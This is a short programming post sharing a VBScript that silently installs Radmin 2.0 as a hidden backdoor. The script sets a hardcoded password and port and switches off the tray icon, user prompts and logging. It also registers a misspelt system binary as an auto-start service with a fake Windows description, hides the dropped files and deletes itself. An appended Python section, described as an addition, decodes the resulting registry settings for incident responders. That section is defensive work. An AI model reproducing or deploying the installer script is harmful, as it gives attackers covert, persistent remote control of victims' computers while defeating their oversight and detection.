
VBS script implementing a Radmin "ultimate backdoor", with self-deletion

Author: Anonymous   Source: ASP Programming   Published: 2013-07-09


The code is as follows:

On Error Resume Next
Const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & _
    strComputer & "\root\default:StdRegProv")
' Create the Radmin 2.0 server key tree under HKLM\SYSTEM
strKeyPath = "SYSTEM\RAdmin"
oReg.CreateKey HKEY_LOCAL_MACHINE, strKeyPath
strKeyPath = "SYSTEM\RAdmin\v2.0"
oReg.CreateKey HKEY_LOCAL_MACHINE, strKeyPath
strKeyPath = "SYSTEM\RAdmin\v2.0\Server"
oReg.CreateKey HKEY_LOCAL_MACHINE, strKeyPath
strKeyPath = "SYSTEM\RAdmin\v2.0\Server\iplist"
oReg.CreateKey HKEY_LOCAL_MACHINE, strKeyPath
strKeyPath = "SYSTEM\RAdmin\v2.0\Server\Parameters"
oReg.CreateKey HKEY_LOCAL_MACHINE, strKeyPath
' Server parameters; each one is written as a 4-byte REG_BINARY (little-endian DWORD)
Set objRegistry = GetObject("Winmgmts:root\default:StdRegProv")
strPath = "SYSTEM\RAdmin\v2.0\Server\Parameters"
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE, strPath, "AskUser", uBinary)
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE, strPath, "AutoAllow", uBinary)
uBinary = Array(1,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE, strPath, "DisableTrayIcon", uBinary)
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE, strPath, "EnableEventLog", uBinary)
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE, strPath, "EnableLogFile", uBinary)
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE, strPath, "FilterIp", uBinary)
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE, strPath, "NTAuthEnabled", uBinary)
' Hex bytes taken from a registry export and converted to decimal; password: 241241241
uBinary = Array(198,195,162,215,37,223,10,224,99,83,126,32,212,173,208,119)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE, strPath, "Parameter", uBinary) ' Radmin password
uBinary = Array(5,4,0,0) ' port: 1029
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE, strPath, "Port", uBinary)
uBinary = Array(10,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE, strPath, "Timeout", uBinary)
Set oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & strComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\RAdmin\v2.0\Server\Parameters"
strValueName = "LogFilePath"
strValue = "c:\logfile.txt"
' Register the renamed server binary as a service named WinManageHelp
Set wshshell = CreateObject("wscript.shell")
a = wshshell.run("sc.exe create WinManageHelp binpath= %systemroot%\system32\Exporer.exe start= auto", 0)
oReg.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, strValue
Set oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & strComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\ControlSet001\Services\WinManageHelp"
strValueName = "Description"
strValue = "Windows Media Player Windows Management Instrumentation Player Drivers."
oReg.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, strValue
strValueName = "DisplayName"
strValue = "Windows Management Instrumentation Player Drivers"
oReg.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, strValue
strValueName = "ImagePath"
strValue = "c:\windows\system32\Exporer.exe /service"
oReg.SetExpandedStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, strValue
' Start the service and set read-only/hidden/system attributes on the dropped files
Set wshshell = CreateObject("wscript.shell")
a = wshshell.run("net start WinManageHelp", 0)
b = wshshell.run("attrib +r +h +s %systemroot%\system32\exporer.exe", 0)
c = wshshell.run("attrib +r +h +s %systemroot%\system32\AdmDll.dll", 0)
d = wshshell.run("attrib +r +h +s %systemroot%\system32\raddrv.dll", 0)
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName) ' self-delete
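From the responder's side, the settings above are what a triage script should decode. The following Python example is added here and is not part of the original post: it parses a constructed `reg export` of the Parameters key the script writes (hypothetical host; key path and value names mirror the listing), decodes each 4-byte REG_BINARY as a little-endian DWORD, and reports the listening port (0x0405 = 1029 here; Radmin's documented default is 4899), whether the tray icon, user prompt, logging and NT authentication are switched off, and the timeout.

```python
import re

# Constructed sample `reg export` of the key the script above populates (hypothetical host).
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"AskUser"=hex:00,00,00,00
"DisableTrayIcon"=hex:01,00,00,00
"EnableEventLog"=hex:00,00,00,00
"EnableLogFile"=hex:00,00,00,00
"NTAuthEnabled"=hex:00,00,00,00
"Port"=hex:05,04,00,00
"Timeout"=hex:0a,00,00,00
"LogFilePath"="c:\\logfile.txt"
"""

KEY_RE = re.compile(r"^\[(.+)\]$")
VAL_RE = re.compile(r'^"([^"]+)"=(?:hex:([0-9a-fA-F,]+)|"(.*)")$')
PARAMS_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters"

def parse_reg(text):
    """Minimal .reg parser: {key: {name: bytes | str}}; single-line hex values only."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if (m := KEY_RE.match(line)):
            current = keys.setdefault(m.group(1), {})
        elif current is not None and (m := VAL_RE.match(line)):
            name, hexpart, strpart = m.groups()
            current[name] = bytes.fromhex(hexpart.replace(",", "")) if hexpart else strpart
    return keys

def dword(values, name):
    # The script writes every setting as a 4-byte REG_BINARY holding a little-endian DWORD.
    return int.from_bytes(values.get(name, b"\0\0\0\0")[:4], "little")

def assess_radmin(text):
    """Summarise the Radmin 2.x server settings a responder looks at first."""
    params = parse_reg(text).get(PARAMS_KEY)
    if params is None:
        return None
    return {
        "port": dword(params, "Port"),  # 1029 in the sample; Radmin's documented default is 4899
        "tray_icon_hidden": dword(params, "DisableTrayIcon") == 1,
        "user_prompt_off": dword(params, "AskUser") == 0,
        "logging_off": dword(params, "EnableEventLog") == 0 and dword(params, "EnableLogFile") == 0,
        "nt_auth_off": dword(params, "NTAuthEnabled") == 0,
        "timeout": dword(params, "Timeout"),
    }
```

The same decoding applies to the service key the script creates (ControlSet001\Services\WinManageHelp), where an ImagePath pointing at a misspelt system binary is the second artifact worth checking.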


